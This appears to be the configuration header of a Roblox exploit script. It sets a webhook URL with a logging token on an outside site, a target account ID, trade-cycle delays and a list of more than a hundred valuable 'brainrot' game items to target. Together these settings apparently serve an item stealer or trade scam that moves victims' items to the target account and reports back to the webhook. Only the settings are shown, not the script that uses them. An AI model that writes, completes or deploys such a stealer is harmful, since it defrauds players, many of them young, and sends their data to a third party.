getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_af0d17f0c3394135940b901ed03259be"
getgenv().TARGET_ID = 9186422155
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["nacho spyder"] = true,
    ["Skibidi Toilet"] = true, 
    ["Strawberry Elephant"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Perrito Burrito"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["La Sahur Combinasion"] = true,
    ["Chill Puppy"] = true,
    ["Los Sweethearts"] = true,
    ["Spinny Hammy"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Los Mobilis"] = true,
    ["Bacuru and Egguru"] = true,
    ["Los Candies"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Vulturino Skeletono"] = true,
    ["Jackorilla"] = true,
    ["Telemorte"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Present"] = true,
    ["Donkeyturbo Express"] = true,
    ["Noo my Heart"] = true,
    ["Fishino Clownino"] = true,
    ["Chimnino"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Horegini Boom"] = true,
    ["Mi Gatito"] = true,
    ["Arcadopus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Rang Ring Bus"] = true,
    ["67"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Mi Gatitos"] = true,
    ["Esok Sekolah"] = true,
    ["Los 67"] = true,
    ["Rosetti Tualetti"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["List List List Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Job Job Job Sahur"] = true
}
